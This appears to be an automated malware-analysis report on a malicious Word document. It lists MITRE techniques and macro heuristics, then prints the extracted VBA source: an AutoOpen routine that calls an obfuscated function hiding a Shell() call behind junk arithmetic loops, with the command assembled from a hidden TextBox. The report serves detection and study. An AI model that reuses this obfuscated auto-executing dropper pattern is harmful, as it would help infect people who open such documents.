MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic that fired indicates a Shell() call within the VBA code, and the AutoOpen macro means the code runs immediately when the document is opened. The script attempts to use the Shell function, likely to download and execute a secondary payload, which is a common technique for malware droppers.
Heuristics (6)
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3765 bytes | b1bc50d7f3a8e7c509fc11a741d3782a8d9ae79f52065b691ded4b9bf0b2ff42 |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Z9826672168"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
X4430 = 262 - 102
j543 = 935 - 66
z941 = 614 - 194
b16190
o9483 = 804 - 461
Q438 = 963 - 530
A330 = 730 - 826
End Sub
Attribute VB_Name = "j891537430"
Function b16190()
On Error Resume Next
For Each q1466 In F059
K661 = Round(H4767 / CSng(o088))
If O2840 Or w5385 Then
r9600 = Sin(f2351)
End If
s390 = CSng(N4986 * CBool(o8647))
If G9986 > l2281 Then
h482 = Oct(Z780 - z4623 / 973 - Round(752 + Sin(Y606)))
End If
Next
J84519653 = Array(E21751797, r5246840, i223206, Interaction.Shell(("" + i226281 + F85929797 + Z9826672168.TextBox1) + u9535334 + r45727709 + b933981, 94 - 94), f331254, d45212059, W0556427)
For Each n472 In Q1263
c340 = Round(G949 / CSng(P943))
If z695 Or C699 Then
l1799 = Sin(N3502)
End If
j507 = CSng(k656 * CBool(v646))
If D031 > Y452 Then
Z061 = Oct(v3080 - d899 / 224 - Round(444 + Sin(W216)))
End If
Next
For Each n7594 In h4007
v2051 = Round(t236 / CSng(U9957))
If W4911 Or C602 Then
I232 = Sin(u5835)
End If
l6053 = CSng(B1661 * CBool(c7859))
If z0118 > I3760 Then
i446 = Oct(N2722 - w7726 / 664 - Round(517 + Sin(U714)))
End If
Next
End Function
Attribute VB_Name = "Q30883096"
Attribute VB_Name = "z504777785342"
Attribute VB_Name = "M0010709"
Attribute VB_Name = "Q307582223121"
Attribute VB_Name = "w7981085811"
Attribute VB_Name = "l1177845704"
Attribute VB_Name = "G1011057"
Attribute VB_Name = "F2868275"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Y235542137601"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Z802497006618"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "T9947086763"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "R6220835746982"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "w45484728297236"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False